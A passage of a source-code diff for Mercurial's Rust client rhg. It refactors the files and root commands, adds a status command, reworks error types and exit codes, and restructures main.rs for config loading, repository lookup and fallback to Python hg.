.strip_prefix(repo.working_directory_path()) - .expect("cwd was already checked within the repository"); - let rooted_cwd = HgPathBuf::from(get_bytes_from_path(rooted_cwd)); - - let mut stdout = ui.stdout_buffer(); + let rev = invocation.subcommand_args.value_of("rev"); - for file in files { - stdout.write_all(relativize_path(file, &rooted_cwd).as_ref())?; - stdout.write_all(b"\n")?; - } - stdout.flush()?; - Ok(()) - } -} - -impl<'a> Command for FilesCommand<'a> { - fn run(&self, ui: &Ui) -> Result<(), CommandError> { - let repo = Repo::find()?; - repo.check_requirements()?; - if let Some(rev) = self.rev { - let files = list_rev_tracked_files(&repo, rev) - .map_err(|e| map_rev_error(rev, e))?; - self.display_files(ui, &repo, files.iter()) - } else { - let distate = Dirstate::new(&repo).map_err(map_dirstate_error)?; - let files = distate.tracked_files().map_err(map_dirstate_error)?; - self.display_files(ui, &repo, files) - } + let repo = invocation.repo?; + if let Some(rev) = rev { + let files = list_rev_tracked_files(repo, rev).map_err(|e| 
(e, rev))?; + display_files(invocation.ui, repo, files.iter()) + } else { + let distate = Dirstate::new(repo)?; + let files = distate.tracked_files()?; + display_files(invocation.ui, repo, files) } } -/// Convert `ListRevTrackedFilesErrorKind` to `CommandError` -fn map_rev_error(rev: &str, err: ListRevTrackedFilesError) -> CommandError { - CommandError { - kind: match err.kind { - ListRevTrackedFilesErrorKind::IoError(err) => { - CommandErrorKind::Abort(Some( - utf8_to_local(&format!("abort: {}\n", err)).into(), - )) - } - ListRevTrackedFilesErrorKind::InvalidRevision => { - CommandErrorKind::Abort(Some( - utf8_to_local(&format!( - "abort: invalid revision identifier {}\n", - rev - )) - .into(), - )) - } - ListRevTrackedFilesErrorKind::AmbiguousPrefix => { - CommandErrorKind::Abort(Some( - utf8_to_local(&format!( - "abort: ambiguous revision identifier {}\n", - rev - )) - .into(), - )) - } - ListRevTrackedFilesErrorKind::UnsuportedRevlogVersion(version) => { - CommandErrorKind::Abort(Some( - utf8_to_local(&format!( - "abort: unsupported revlog version {}\n", - version - )) - .into(), - )) - } - ListRevTrackedFilesErrorKind::CorruptedRevlog => { - CommandErrorKind::Abort(Some( - "abort: corrupted revlog\n".into(), - )) - } - ListRevTrackedFilesErrorKind::UnknowRevlogDataFormat(format) => { - CommandErrorKind::Abort(Some( - utf8_to_local(&format!( - "abort: unknow revlog dataformat {:?}\n", - format - )) - .into(), - )) - } - }, +fn display_files<'a>( + ui: &Ui, + repo: &Repo, + files: impl IntoIterator<Item = &'a HgPath>, +) -> Result<(), CommandError> { + let mut stdout = ui.stdout_buffer(); + + let cwd = current_dir()?; + let working_directory = repo.working_directory_path(); + let working_directory = cwd.join(working_directory); // Make it absolute + + let mut any = false; + if let Ok(cwd_relative_to_repo) = cwd.strip_prefix(&working_directory) { + // The current directory is inside the repo, so we can work with + // relative paths + let cwd = 
HgPathBuf::from(get_bytes_from_path(cwd_relative_to_repo)); + for file in files { + any = true; + stdout.write_all(relativize_path(&file, &cwd).as_ref())?; + stdout.write_all(b"\n")?; + } + } else { + let working_directory = + HgPathBuf::from(get_bytes_from_path(working_directory)); + let cwd = HgPathBuf::from(get_bytes_from_path(cwd)); + for file in files { + any = true; + // Absolute path in the filesystem + let file = working_directory.join(file); + stdout.write_all(relativize_path(&file, &cwd).as_ref())?; + stdout.write_all(b"\n")?; + } + } + + stdout.flush()?; + if any { + Ok(()) + } else { + Err(CommandError::Unsuccessful) } } - -/// Convert `ListDirstateTrackedFilesError` to `CommandError` -fn map_dirstate_error(err: ListDirstateTrackedFilesError) -> CommandError { - CommandError { - kind: match err.kind { - ListDirstateTrackedFilesErrorKind::IoError(err) => { - CommandErrorKind::Abort(Some( - utf8_to_local(&format!("abort: {}\n", err)).into(), - )) - } - ListDirstateTrackedFilesErrorKind::ParseError(_) => { - CommandErrorKind::Abort(Some( - // TODO find a better error message - b"abort: parse error\n".to_vec(), - )) - } - }, - } -} diff --git a/rust/rhg/src/commands/root.rs b/rust/rhg/src/commands/root.rs --- a/rust/rhg/src/commands/root.rs +++ b/rust/rhg/src/commands/root.rs @@ -1,8 +1,6 @@ -use crate::commands::Command; use crate::error::CommandError; -use crate::ui::Ui; use format_bytes::format_bytes; -use hg::repo::Repo; +use hg::errors::{IoErrorContext, IoResultExt}; use hg::utils::files::get_bytes_from_path; pub const HELP_TEXT: &str = " @@ -11,19 +9,20 @@ Returns 0 on success. 
"; -pub struct RootCommand {} - -impl RootCommand { - pub fn new() -> Self { - RootCommand {} - } +pub fn args() -> clap::App<'static, 'static> { + clap::SubCommand::with_name("root").about(HELP_TEXT) } -impl Command for RootCommand { - fn run(&self, ui: &Ui) -> Result<(), CommandError> { - let repo = Repo::find()?; - let bytes = get_bytes_from_path(repo.working_directory_path()); - ui.write_stdout(&format_bytes!(b"{}\n", bytes.as_slice()))?; - Ok(()) - } +pub fn run(invocation: &crate::CliInvocation) -> Result<(), CommandError> { + let repo = invocation.repo?; + let working_directory = repo.working_directory_path(); + let working_directory = std::fs::canonicalize(working_directory) + .with_context(|| { + IoErrorContext::CanonicalizingPath(working_directory.to_owned()) + })?; + let bytes = get_bytes_from_path(&working_directory); + invocation + .ui + .write_stdout(&format_bytes!(b"{}\n", bytes.as_slice()))?; + Ok(()) } diff --git a/rust/rhg/src/commands/status.rs b/rust/rhg/src/commands/status.rs new file mode 100644 --- /dev/null +++ b/rust/rhg/src/commands/status.rs @@ -0,0 +1,315 @@ +// status.rs +// +// Copyright 2020, Georges Racinet <georges.racinets@octobus.net> +// +// This software may be used and distributed according to the terms of the +// GNU General Public License version 2 or any later version. + +use crate::error::CommandError; +use crate::ui::Ui; +use clap::{Arg, SubCommand}; +use hg; +use hg::errors::IoResultExt; +use hg::matchers::AlwaysMatcher; +use hg::operations::cat; +use hg::repo::Repo; +use hg::revlog::node::Node; +use hg::utils::hg_path::{hg_path_to_os_string, HgPath}; +use hg::{DirstateMap, StatusError}; +use hg::{HgPathCow, StatusOptions}; +use log::{info, warn}; +use std::convert::TryInto; +use std::fs; +use std::io::BufReader; +use std::io::Read; + +pub const HELP_TEXT: &str = " +Show changed files in the working directory + +This is a pure Rust version of `hg status`. + +Some options might be missing, check the list below. 
+"; + +pub fn args() -> clap::App<'static, 'static> { + SubCommand::with_name("status") + .alias("st") + .about(HELP_TEXT) + .arg( + Arg::with_name("all") + .help("show status of all files") + .short("-A") + .long("--all"), + ) + .arg( + Arg::with_name("modified") + .help("show only modified files") + .short("-m") + .long("--modified"), + ) + .arg( + Arg::with_name("added") + .help("show only added files") + .short("-a") + .long("--added"), + ) + .arg( + Arg::with_name("removed") + .help("show only removed files") + .short("-r") + .long("--removed"), + ) + .arg( + Arg::with_name("clean") + .help("show only clean files") + .short("-c") + .long("--clean"), + ) + .arg( + Arg::with_name("deleted") + .help("show only deleted files") + .short("-d") + .long("--deleted"), + ) + .arg( + Arg::with_name("unknown") + .help("show only unknown (not tracked) files") + .short("-u") + .long("--unknown"), + ) + .arg( + Arg::with_name("ignored") + .help("show only ignored files") + .short("-i") + .long("--ignored"), + ) +} + +/// Pure data type allowing the caller to specify file states to display +#[derive(Copy, Clone, Debug)] +pub struct DisplayStates { + pub modified: bool, + pub added: bool, + pub removed: bool, + pub clean: bool, + pub deleted: bool, + pub unknown: bool, + pub ignored: bool, +} + +pub const DEFAULT_DISPLAY_STATES: DisplayStates = DisplayStates { + modified: true, + added: true, + removed: true, + clean: false, + deleted: true, + unknown: true, + ignored: false, +}; + +pub const ALL_DISPLAY_STATES: DisplayStates = DisplayStates { + modified: true, + added: true, + removed: true, + clean: true, + deleted: true, + unknown: true, + ignored: true, +}; + +impl DisplayStates { + pub fn is_empty(&self) -> bool { + !(self.modified + || self.added + || self.removed + || self.clean + || self.deleted + || self.unknown + || self.ignored) + } +} + +pub fn run(invocation: &crate::CliInvocation) -> Result<(), CommandError> { + let status_enabled_default = false; + let 
status_enabled = invocation.config.get_option(b"rhg", b"status")?; + if !status_enabled.unwrap_or(status_enabled_default) { + return Err(CommandError::unsupported( + "status is experimental in rhg (enable it with 'rhg.status = true' \ + or enable fallback with 'rhg.on-unsupported = fallback')" + )); + } + + let ui = invocation.ui; + let args = invocation.subcommand_args; + let display_states = if args.is_present("all") { + // TODO when implementing `--quiet`: it excludes clean files + // from `--all` + ALL_DISPLAY_STATES + } else { + let requested = DisplayStates { + modified: args.is_present("modified"), + added: args.is_present("added"), + removed: args.is_present("removed"), + clean: args.is_present("clean"), + deleted: args.is_present("deleted"), + unknown: args.is_present("unknown"), + ignored: args.is_present("ignored"), + }; + if requested.is_empty() { + DEFAULT_DISPLAY_STATES + } else { + requested + } + }; + + let repo = invocation.repo?; + let mut dmap = DirstateMap::new(); + let dirstate_data = repo.hg_vfs().mmap_open("dirstate")?; + let parents = dmap.read(&dirstate_data)?; + let options = StatusOptions { + // TODO should be provided by the dirstate parsing and + // hence be stored on dmap. Using a value that assumes we aren't + // below the time resolution granularity of the FS and the + // dirstate. 
+ last_normal_time: 0, + // we're currently supporting file systems with exec flags only + // anyway + check_exec: true, + list_clean: display_states.clean, + list_unknown: display_states.unknown, + list_ignored: display_states.ignored, + collect_traversed_dirs: false, + }; + let ignore_file = repo.working_directory_vfs().join(".hgignore"); // TODO hardcoded + let ((lookup, ds_status), pattern_warnings) = hg::status( + &dmap, + &AlwaysMatcher, + repo.working_directory_path().to_owned(), + vec![ignore_file], + options, + )?; + if !pattern_warnings.is_empty() { + warn!("Pattern warnings: {:?}", &pattern_warnings); + } + + if !ds_status.bad.is_empty() { + warn!("Bad matches {:?}", &(ds_status.bad)) + } + if !lookup.is_empty() { + info!( + "Files to be rechecked by retrieval from filelog: {:?}", + &lookup + ); + } + // TODO check ordering to match `hg status` output. + // (this is as in `hg help status`) + if display_states.modified { + display_status_paths(ui, &(ds_status.modified), b"M")?; + } + if !lookup.is_empty() { + let p1: Node = parents + .expect( + "Dirstate with no parents should not list any file to + be rechecked for modifications", + ) + .p1 + .into(); + let p1_hex = format!("{:x}", p1); + let mut rechecked_modified: Vec<HgPathCow> = Vec::new(); + let mut rechecked_clean: Vec<HgPathCow> = Vec::new(); + for to_check in lookup { + if cat_file_is_modified(repo, &to_check, &p1_hex)? 
{ + rechecked_modified.push(to_check); + } else { + rechecked_clean.push(to_check); + } + } + if display_states.modified { + display_status_paths(ui, &rechecked_modified, b"M")?; + } + if display_states.clean { + display_status_paths(ui, &rechecked_clean, b"C")?; + } + } + if display_states.added { + display_status_paths(ui, &(ds_status.added), b"A")?; + } + if display_states.clean { + display_status_paths(ui, &(ds_status.clean), b"C")?; + } + if display_states.removed { + display_status_paths(ui, &(ds_status.removed), b"R")?; + } + if display_states.deleted { + display_status_paths(ui, &(ds_status.deleted), b"!")?; + } + if display_states.unknown { + display_status_paths(ui, &(ds_status.unknown), b"?")?; + } + if display_states.ignored { + display_status_paths(ui, &(ds_status.ignored), b"I")?; + } + Ok(()) +} + +// Probably more elegant to use a Deref or Borrow trait rather than +// harcode HgPathBuf, but probably not really useful at this point +fn display_status_paths( + ui: &Ui, + paths: &[HgPathCow], + status_prefix: &[u8], +) -> Result<(), CommandError> { + for path in paths { + // Same TODO as in commands::root + let bytes: &[u8] = path.as_bytes(); + // TODO optim, probably lots of unneeded copies here, especially + // if out stream is buffered + ui.write_stdout(&[status_prefix, b" ", bytes, b"\n"].concat())?; + } + Ok(()) +} + +/// Check if a file is modified by comparing actual repo store and file system. +/// +/// This meant to be used for those that the dirstate cannot resolve, due +/// to time resolution limits. 
+/// +/// TODO: detect permission bits and similar metadata modifications +fn cat_file_is_modified( + repo: &Repo, + hg_path: &HgPath, + rev: &str, +) -> Result<bool, CommandError> { + // TODO CatRev expects &[HgPathBuf], something like + // &[impl Deref<HgPath>] would be nicer and should avoid the copy + let path_bufs = [hg_path.into()]; + // TODO IIUC CatRev returns a simple Vec<u8> for all files + // being able to tell them apart as (path, bytes) would be nicer + // and OPTIM would allow manifest resolution just once. + let output = cat(repo, rev, &path_bufs).map_err(|e| (e, rev))?; + + let fs_path = repo + .working_directory_vfs() + .join(hg_path_to_os_string(hg_path).expect("HgPath conversion")); + let hg_data_len: u64 = match output.concatenated.len().try_into() { + Ok(v) => v, + Err(_) => { + // conversion of data length to u64 failed, + // good luck for any file to have this content + return Ok(true); + } + }; + let fobj = fs::File::open(&fs_path).when_reading_file(&fs_path)?; + if fobj.metadata().map_err(|e| StatusError::from(e))?.len() != hg_data_len + { + return Ok(true); + } + for (fs_byte, hg_byte) in + BufReader::new(fobj).bytes().zip(output.concatenated) + { + if fs_byte.map_err(|e| StatusError::from(e))? 
!= hg_byte { + return Ok(true); + } + } + Ok(false) +} diff --git a/rust/rhg/src/error.rs b/rust/rhg/src/error.rs --- a/rust/rhg/src/error.rs +++ b/rust/rhg/src/error.rs @@ -1,124 +1,195 @@ use crate::exitcode; +use crate::ui::utf8_to_local; use crate::ui::UiError; +use crate::NoRepoInCwdError; use format_bytes::format_bytes; -use hg::operations::{FindRootError, FindRootErrorKind}; -use hg::requirements::RequirementsError; +use hg::config::{ConfigError, ConfigParseError, ConfigValueParseError}; +use hg::errors::HgError; +use hg::repo::RepoError; +use hg::revlog::revlog::RevlogError; use hg::utils::files::get_bytes_from_path; +use hg::{DirstateError, DirstateMapError, StatusError}; use std::convert::From; -use std::path::PathBuf; /// The kind of command error #[derive(Debug)] -pub enum CommandErrorKind { - /// The root of the repository cannot be found - RootNotFound(PathBuf), - /// The current directory cannot be found - CurrentDirNotFound(std::io::Error), - /// `.hg/requires` - RequirementsError(RequirementsError), - /// The standard output stream cannot be written to - StdoutError, - /// The standard error stream cannot be written to - StderrError, - /// The command aborted - Abort(Option<Vec<u8>>), - /// A mercurial capability as not been implemented. - Unimplemented, +pub enum CommandError { + /// Exit with an error message and "standard" failure exit code. + Abort { + message: Vec<u8>, + detailed_exit_code: exitcode::ExitCode, + }, + + /// Exit with a failure exit code but no message. + Unsuccessful, + + /// Encountered something (such as a CLI argument, repository layout, …) + /// not supported by this version of `rhg`. Depending on configuration + /// `rhg` may attempt to silently fall back to Python-based `hg`, which + /// may or may not support this feature. 
+ UnsupportedFeature { message: Vec<u8> }, } -impl CommandErrorKind { - pub fn get_exit_code(&self) -> exitcode::ExitCode { - match self { - CommandErrorKind::RootNotFound(_) => exitcode::ABORT, - CommandErrorKind::CurrentDirNotFound(_) => exitcode::ABORT, - CommandErrorKind::RequirementsError( - RequirementsError::Unsupported { .. }, - ) => exitcode::UNIMPLEMENTED_COMMAND, - CommandErrorKind::RequirementsError(_) => exitcode::ABORT, - CommandErrorKind::StdoutError => exitcode::ABORT, - CommandErrorKind::StderrError => exitcode::ABORT, - CommandErrorKind::Abort(_) => exitcode::ABORT, - CommandErrorKind::Unimplemented => exitcode::UNIMPLEMENTED_COMMAND, +impl CommandError { + pub fn abort(message: impl AsRef<str>) -> Self { + CommandError::abort_with_exit_code(message, exitcode::ABORT) + } + + pub fn abort_with_exit_code( + message: impl AsRef<str>, + detailed_exit_code: exitcode::ExitCode, + ) -> Self { + CommandError::Abort { + // TODO: bytes-based (instead of Unicode-based) formatting + // of error messages to handle non-UTF-8 filenames etc: + // https://www.mercurial-scm.org/wiki/EncodingStrategy#Mixing_output + message: utf8_to_local(message.as_ref()).into(), + detailed_exit_code: detailed_exit_code, } } - /// Return the message corresponding to the error kind if any - pub fn get_error_message_bytes(&self) -> Option<Vec<u8>> { - match self { - CommandErrorKind::RootNotFound(path) => { - let bytes = get_bytes_from_path(path); - Some(format_bytes!( - b"abort: no repository found in '{}' (.hg not found)!\n", - bytes.as_slice() - )) + pub fn unsupported(message: impl AsRef<str>) -> Self { + CommandError::UnsupportedFeature { + message: utf8_to_local(message.as_ref()).into(), + } + } +} + +/// For now we don’t differenciate between invalid CLI args and valid for `hg` +/// but not supported yet by `rhg`. 
+impl From<clap::Error> for CommandError { + fn from(error: clap::Error) -> Self { + CommandError::unsupported(error.to_string()) + } +} + +impl From<HgError> for CommandError { + fn from(error: HgError) -> Self { + match error { + HgError::UnsupportedFeature(message) => { + CommandError::unsupported(message) } - CommandErrorKind::CurrentDirNotFound(e) => Some(format_bytes!( - b"abort: error getting current working directory: {}\n", - e.to_string().as_bytes(), - )), - CommandErrorKind::RequirementsError( - RequirementsError::Corrupted, - ) => Some( - "abort: .hg/requires is corrupted\n".as_bytes().to_owned(), - ), - CommandErrorKind::Abort(message) => message.to_owned(), - _ => None, + _ => CommandError::abort(error.to_string()), } } } -/// The error type for the Command trait -#[derive(Debug)] -pub struct CommandError { - pub kind: CommandErrorKind, -} - -impl CommandError { - /// Exist the process with the corresponding exit code. - pub fn exit(&self) { - std::process::exit(self.kind.get_exit_code()) - } - - /// Return the message corresponding to the command error if any - pub fn get_error_message_bytes(&self) -> Option<Vec<u8>> { - self.kind.get_error_message_bytes() - } -} - -impl From<CommandErrorKind> for CommandError { - fn from(kind: CommandErrorKind) -> Self { - CommandError { kind } +impl From<ConfigValueParseError> for CommandError { + fn from(error: ConfigValueParseError) -> Self { + CommandError::abort_with_exit_code( + error.to_string(), + exitcode::CONFIG_ERROR_ABORT, + ) } } impl From<UiError> for CommandError { - fn from(error: UiError) -> Self { - CommandError { - kind: match error { - UiError::StdoutError(_) => CommandErrorKind::StdoutError, - UiError::StderrError(_) => CommandErrorKind::StderrError, + fn from(_error: UiError) -> Self { + // If we already failed writing to stdout or stderr, + // writing an error message to stderr about it would be likely to fail + // too. 
+ CommandError::abort("") + } +} + +impl From<RepoError> for CommandError { + fn from(error: RepoError) -> Self { + match error { + RepoError::NotFound { at } => CommandError::Abort { + message: format_bytes!( + b"abort: repository {} not found", + get_bytes_from_path(at) + ), + detailed_exit_code: exitcode::ABORT, }, + RepoError::ConfigParseError(error) => error.into(), + RepoError::Other(error) => error.into(), + } + } +} + +impl<'a> From<&'a NoRepoInCwdError> for CommandError { + fn from(error: &'a NoRepoInCwdError) -> Self { + let NoRepoInCwdError { cwd } = error; + CommandError::Abort { + message: format_bytes!( + b"abort: no repository found in '{}' (.hg not found)!", + get_bytes_from_path(cwd) + ), + detailed_exit_code: exitcode::ABORT, + } + } +} + +impl From<ConfigError> for CommandError { + fn from(error: ConfigError) -> Self { + match error { + ConfigError::Parse(error) => error.into(), + ConfigError::Other(error) => error.into(), } } } -impl From<FindRootError> for CommandError { - fn from(err: FindRootError) -> Self { - match err.kind { - FindRootErrorKind::RootNotFound(path) => CommandError { - kind: CommandErrorKind::RootNotFound(path), - }, - FindRootErrorKind::GetCurrentDirError(e) => CommandError { - kind: CommandErrorKind::CurrentDirNotFound(e), - }, +impl From<ConfigParseError> for CommandError { + fn from(error: ConfigParseError) -> Self { + let ConfigParseError { + origin, + line, + message, + } = error; + let line_message = if let Some(line_number) = line { + format_bytes!(b":{}", line_number.to_string().into_bytes()) + } else { + Vec::new() + }; + CommandError::Abort { + message: format_bytes!( + b"config error at {}{}: {}", + origin, + line_message, + message + ), + detailed_exit_code: exitcode::CONFIG_ERROR_ABORT, } } } -impl From<RequirementsError> for CommandError { - fn from(err: RequirementsError) -> Self { - CommandError { - kind: CommandErrorKind::RequirementsError(err), +impl From<(RevlogError, &str)> for CommandError { + fn 
from((err, rev): (RevlogError, &str)) -> CommandError { + match err { + RevlogError::WDirUnsupported => CommandError::abort( + "abort: working directory revision cannot be specified", + ), + RevlogError::InvalidRevision => CommandError::abort(format!( + "abort: invalid revision identifier: {}", + rev + )), + RevlogError::AmbiguousPrefix => CommandError::abort(format!( + "abort: ambiguous revision identifier: {}", + rev + )), + RevlogError::Other(error) => error.into(), } } } + +impl From<StatusError> for CommandError { + fn from(error: StatusError) -> Self { + CommandError::abort(format!("{}", error)) + } +} + +impl From<DirstateMapError> for CommandError { + fn from(error: DirstateMapError) -> Self { + CommandError::abort(format!("{}", error)) + } +} + +impl From<DirstateError> for CommandError { + fn from(error: DirstateError) -> Self { + match error { + DirstateError::Common(error) => error.into(), + DirstateError::Map(error) => error.into(), + } + } +} diff --git a/rust/rhg/src/exitcode.rs b/rust/rhg/src/exitcode.rs --- a/rust/rhg/src/exitcode.rs +++ b/rust/rhg/src/exitcode.rs @@ -6,5 +6,11 @@ /// Generic abort pub const ABORT: ExitCode = 255; -/// Command not implemented by rhg -pub const UNIMPLEMENTED_COMMAND: ExitCode = 252; +// Abort when there is a config related error +pub const CONFIG_ERROR_ABORT: ExitCode = 30; + +/// Generic something completed but did not succeed +pub const UNSUCCESSFUL: ExitCode = 1; + +/// Command or feature not implemented by rhg +pub const UNIMPLEMENTED: ExitCode = 252; diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -1,185 +1,509 @@ extern crate log; +use crate::ui::Ui; use clap::App; use clap::AppSettings; use clap::Arg; -use clap::ArgGroup; use clap::ArgMatches; -use clap::SubCommand; -use hg::operations::DebugDataKind; -use std::convert::TryFrom; +use format_bytes::{format_bytes, join}; +use hg::config::Config; +use hg::repo::{Repo, RepoError}; +use 
hg::utils::files::{get_bytes_from_os_str, get_path_from_bytes}; +use hg::utils::SliceExt; +use std::ffi::OsString; +use std::path::PathBuf; +use std::process::Command; -mod commands; +mod blackbox; mod error; mod exitcode; mod ui; -use commands::Command; use error::CommandError; -fn main() { - env_logger::init(); +fn main_with_result( + process_start_time: &blackbox::ProcessStartTime, + ui: &ui::Ui, + repo: Result<&Repo, &NoRepoInCwdError>, + config: &Config, +) -> Result<(), CommandError> { + check_extensions(config)?; + let app = App::new("rhg") - .setting(AppSettings::AllowInvalidUtf8) + .global_setting(AppSettings::AllowInvalidUtf8) + .global_setting(AppSettings::DisableVersion) .setting(AppSettings::SubcommandRequired) .setting(AppSettings::VersionlessSubcommands) - .version("0.0.1") - .subcommand( - SubCommand::with_name("root").about(commands::root::HELP_TEXT), - ) - .subcommand( - SubCommand::with_name("files") - .arg( - Arg::with_name("rev") - .help("search the repository as it is in REV") - .short("-r") - .long("--revision") - .value_name("REV") - .takes_value(true), - ) - .about(commands::files::HELP_TEXT), + .arg( + Arg::with_name("repository") + .help("repository root directory") + .short("-R") + .long("--repository") + .value_name("REPO") + .takes_value(true) + // Both ok: `hg -R ./foo log` or `hg log -R ./foo` + .global(true), ) - .subcommand( - SubCommand::with_name("cat") - .arg( - Arg::with_name("rev") - .help("search the repository as it is in REV") - .short("-r") - .long("--revision") - .value_name("REV") - .takes_value(true), - ) - .arg( - clap::Arg::with_name("files") - .required(true) - .multiple(true) - .empty_values(false) - .value_name("FILE") - .help("Activity to start: activity@category"), - ) - .about(commands::cat::HELP_TEXT), + .arg( + Arg::with_name("config") + .help("set/override config option (use 'section.name=value')") + .long("--config") + .value_name("CONFIG") + .takes_value(true) + .global(true) + // Ok: `--config 
section.key1=val --config section.key2=val2` + .multiple(true) + // Not ok: `--config section.key1=val section.key2=val2` + .number_of_values(1), + ) + .arg( + Arg::with_name("cwd") + .help("change working directory") + .long("--cwd") + .value_name("DIR") + .takes_value(true) + .global(true), ) - .subcommand( - SubCommand::with_name("debugdata") - .about(commands::debugdata::HELP_TEXT) - .arg( - Arg::with_name("changelog") - .help("open changelog") - .short("-c") - .long("--changelog"), - ) - .arg( - Arg::with_name("manifest") - .help("open manifest") - .short("-m") - .long("--manifest"), + .version("0.0.1"); + let app = add_subcommand_args(app); + + let matches = app.clone().get_matches_safe()?; + + let (subcommand_name, subcommand_matches) = matches.subcommand(); + let run = subcommand_run_fn(subcommand_name) + .expect("unknown subcommand name from clap despite AppSettings::SubcommandRequired"); + let subcommand_args = subcommand_matches + .expect("no subcommand arguments from clap despite AppSettings::SubcommandRequired"); + + let invocation = CliInvocation { + ui, + subcommand_args, + config, + repo, + }; + let blackbox = blackbox::Blackbox::new(&invocation, process_start_time)?; + blackbox.log_command_start(); + let result = run(&invocation); + blackbox.log_command_end(exit_code( + &result, + // TODO: show a warning or combine with original error if `get_bool` + // returns an error + config + .get_bool(b"ui", b"detailed-exit-code") + .unwrap_or(false), + )); + result +} + +fn main() { + // Run this first, before we find out if the blackbox extension is even + // enabled, in order to include everything in-between in the duration + // measurements. Reading config files can be slow if they’re on NFS. 
+ let process_start_time = blackbox::ProcessStartTime::now(); + + env_logger::init(); + let ui = ui::Ui::new(); + + let early_args = EarlyArgs::parse(std::env::args_os()); + + let initial_current_dir = early_args.cwd.map(|cwd| { + let cwd = get_path_from_bytes(&cwd); + std::env::current_dir() + .and_then(|initial| { + std::env::set_current_dir(cwd)?; + Ok(initial) + }) + .unwrap_or_else(|error| { + exit( + &None, + &ui, + OnUnsupported::Abort, + Err(CommandError::abort(format!( + "abort: {}: '{}'", + error, + cwd.display() + ))), + false, ) - .group( - ArgGroup::with_name("") - .args(&["changelog", "manifest"]) - .required(true), - ) - .arg( - Arg::with_name("rev") - .help("revision") - .required(true) - .value_name("REV"), - ), - ) - .subcommand( - SubCommand::with_name("debugrequirements") - .about(commands::debugrequirements::HELP_TEXT), - ); - - let matches = app.clone().get_matches_safe().unwrap_or_else(|err| { - let _ = ui::Ui::new().writeln_stderr_str(&err.message); - std::process::exit(exitcode::UNIMPLEMENTED_COMMAND) + }) }); - let ui = ui::Ui::new(); + let non_repo_config = + Config::load(early_args.config).unwrap_or_else(|error| { + // Normally this is decided based on config, but we don’t have that + // available. As of this writing config loading never returns an + // "unsupported" error but that is not enforced by the type system. + let on_unsupported = OnUnsupported::Abort; - let command_result = match_subcommand(matches, &ui); + exit( + &initial_current_dir, + &ui, + on_unsupported, + Err(error.into()), + false, + ) + }); - match command_result { - Ok(_) => std::process::exit(exitcode::OK), - Err(e) => { - let message = e.get_error_message_bytes(); - if let Some(msg) = message { - match ui.write_stderr(&msg) { - Ok(_) => (), - Err(_) => std::process::exit(exitcode::ABORT), - }; - }; - e.exit() + if let Some(repo_path_bytes) = &early_args.repo { + lazy_static::lazy_static! 
{ + static ref SCHEME_RE: regex::bytes::Regex = + // Same as `_matchscheme` in `mercurial/util.py` + regex::bytes::Regex::new("^[a-zA-Z0-9+.\\-]+:").unwrap(); + } + if SCHEME_RE.is_match(&repo_path_bytes) { + exit( + &initial_current_dir, + &ui, + OnUnsupported::from_config(&ui, &non_repo_config), + Err(CommandError::UnsupportedFeature { + message: format_bytes!( + b"URL-like --repository {}", + repo_path_bytes + ), + }), + // TODO: show a warning or combine with original error if + // `get_bool` returns an error + non_repo_config + .get_bool(b"ui", b"detailed-exit-code") + .unwrap_or(false), + ) + } + } + let repo_path = early_args.repo.as_deref().map(get_path_from_bytes); + let repo_result = match Repo::find(&non_repo_config, repo_path) { + Ok(repo) => Ok(repo), + Err(RepoError::NotFound { at }) if repo_path.is_none() => { + // Not finding a repo is not fatal yet, if `-R` was not given + Err(NoRepoInCwdError { cwd: at }) + } + Err(error) => exit( + &initial_current_dir, + &ui, + OnUnsupported::from_config(&ui, &non_repo_config), + Err(error.into()), + // TODO: show a warning or combine with original error if + // `get_bool` returns an error + non_repo_config + .get_bool(b"ui", b"detailed-exit-code") + .unwrap_or(false), + ), + }; + + let config = if let Ok(repo) = &repo_result { + repo.config() + } else { + &non_repo_config + }; + let on_unsupported = OnUnsupported::from_config(&ui, config); + + let result = main_with_result( + &process_start_time, + &ui, + repo_result.as_ref(), + config, + ); + exit( + &initial_current_dir, + &ui, + on_unsupported, + result, + // TODO: show a warning or combine with original error if `get_bool` + // returns an error + config + .get_bool(b"ui", b"detailed-exit-code") + .unwrap_or(false), + ) +} + +fn exit_code( + result: &Result<(), CommandError>, + use_detailed_exit_code: bool, +) -> i32 { + match result { + Ok(()) => exitcode::OK, + Err(CommandError::Abort { + message: _, + detailed_exit_code, + }) => { + if 
use_detailed_exit_code { + *detailed_exit_code + } else { + exitcode::ABORT + } + } + Err(CommandError::Unsuccessful) => exitcode::UNSUCCESSFUL, + + // Exit with a specific code and no error message to let a potential + // wrapper script fallback to Python-based Mercurial. + Err(CommandError::UnsupportedFeature { .. }) => { + exitcode::UNIMPLEMENTED } } } -fn match_subcommand( - matches: ArgMatches, - ui: &ui::Ui, -) -> Result<(), CommandError> { - match matches.subcommand() { - ("root", _) => commands::root::RootCommand::new().run(&ui), - ("files", Some(matches)) => { - commands::files::FilesCommand::try_from(matches)?.run(&ui) +fn exit( + initial_current_dir: &Option<PathBuf>, + ui: &Ui, + mut on_unsupported: OnUnsupported, + result: Result<(), CommandError>, + use_detailed_exit_code: bool, +) -> ! { + if let ( + OnUnsupported::Fallback { executable }, + Err(CommandError::UnsupportedFeature { .. }), + ) = (&on_unsupported, &result) + { + let mut args = std::env::args_os(); + let executable_path = get_path_from_bytes(&executable); + let this_executable = args.next().expect("exepcted argv[0] to exist"); + if executable_path == &PathBuf::from(this_executable) { + // Avoid spawning infinitely many processes until resource + // exhaustion. + let _ = ui.write_stderr(&format_bytes!( + b"Blocking recursive fallback. 
The 'rhg.fallback-executable = {}' config \ + points to `rhg` itself.\n", + executable + )); + on_unsupported = OnUnsupported::Abort + } else { + // `args` is now `argv[1..]` since we’ve already consumed `argv[0]` + let mut command = Command::new(executable_path); + command.args(args); + if let Some(initial) = initial_current_dir { + command.current_dir(initial); + } + let result = command.status(); + match result { + Ok(status) => std::process::exit( + status.code().unwrap_or(exitcode::ABORT), + ), + Err(error) => { + let _ = ui.write_stderr(&format_bytes!( + b"tried to fall back to a '{}' sub-process but got error {}\n", + executable, format_bytes::Utf8(error) + )); + on_unsupported = OnUnsupported::Abort + } + } } - ("cat", Some(matches)) => { - commands::cat::CatCommand::try_from(matches)?.run(&ui) - } - ("debugdata", Some(matches)) => { - commands::debugdata::DebugDataCommand::try_from(matches)?.run(&ui) + } + exit_no_fallback(ui, on_unsupported, result, use_detailed_exit_code) +} + +fn exit_no_fallback( + ui: &Ui, + on_unsupported: OnUnsupported, + result: Result<(), CommandError>, + use_detailed_exit_code: bool, +) -> ! { 